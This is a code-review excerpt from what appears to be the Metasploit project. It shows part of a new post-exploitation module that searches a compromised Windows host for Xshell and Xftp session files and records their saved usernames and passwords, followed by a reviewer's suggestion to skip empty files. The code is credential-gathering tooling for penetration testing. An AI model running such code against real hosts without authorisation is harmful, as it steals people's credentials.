modules/post/windows/gather/credentials/xshell_xftp_password.rb

```diff
@@ -0,0 +1,234 @@
+          if the user chooses to remember the password.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://github.com/HyperSine/how-does-Xmanager-encrypt-password/blob/master/doc/how-does-Xmanager-encrypt-password.md']
+        ],
+        'Author' => [
+          'Kali-Team <kali-team[at]qq.com>'
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ]
+      )
+    )
+    register_options(
+      [
+        OptString.new('MASTER_PASSWORD', [ false, 'If the user sets the master password, e.g.:123456']),
+      ]
+    )
+  end
+
+  def try_encode_file(data)
+    # version 6.0 The character set of the session file will use Unicode
+    # version <= 5.3 The character set of the session file will use ANSI
+    if data[0].unpack('C') == [255] && data[1].unpack('C') == [254]
+      data[2..-1].force_encoding('UTF-16LE').encode('UTF-8')
+    elsif data[0].unpack('C') == [254] && data[1].unpack('C') == [187] && data[2].unpack('C') == [191]
+      data
+    elsif data[0].unpack('C') == [254] && data[1].unpack('C') == [255]
+      data[2..-1].force_encoding('UTF-16BE').encode('UTF-8')
+    else
+      data
+    end
+  end
+
+  def enable_master_passwd?(version_6_path)
+    file_path = expand_path(version_6_path + '\\Common\\MasterPassword.mpw')
+    file = read_file(file_path) if session.fs.file.exist?(file_path)
+    raise 'No data to parse' if file.nil? || file.empty?
+
+    file = try_encode_file(file)
+    file.include?('EnblMasterPasswd=1')
+  end
+
+  def net_sarang_store_config(config)
+    service_data = {
+      address: config[:host],
+      port: config[:port],
+      service_name: config[:type],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: refname,
+      private_type: :password,
+      private_data: config[:password],
+      username: config[:username]
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def enum_version_5_session_file(path, user_profiles)
+    print_status("Search session files on #{path}")
+    xsh = session.fs.file.search(path, '*.xsh')
+    xfp = session.fs.file.search(path, '*.xfp')
+    columns = [
+      'Type',
+      'Name',
+      'Host',
+      'Port',
+      'UserName',
+      'Plaintext',
+      'Password'
+    ]
+    tbl = Rex::Text::Table.new(
+      'Header' => "Path: #{path}",
+      'Columns' => columns
+    )
+    xsh.each do |item|
+      file = read_file(item['path'] + session.fs.file.separator + item['name'])
+      raise 'No data to parse' if file.nil? || file.empty?
+
+      file = try_encode_file(file)
+      ini = Rex::Parser::Ini.from_s(file)
```

Comment:
Using `raise` here will bail out of the method if any of the identified files are empty. That's probably not the expected behavior. Presumably you meant something like this:

```suggestion
      file_name = item['path'] + session.fs.file.separator + item['name']
      file_contents = read_file(file_name)
      
      if file_contents.nil? || file_contents.empty?
        print_status "Skipping empty file: #{file_name}"
        next
      end

      file = try_encode_file(file_contents)
      ini = Rex::Parser::Ini.from_s(file)
```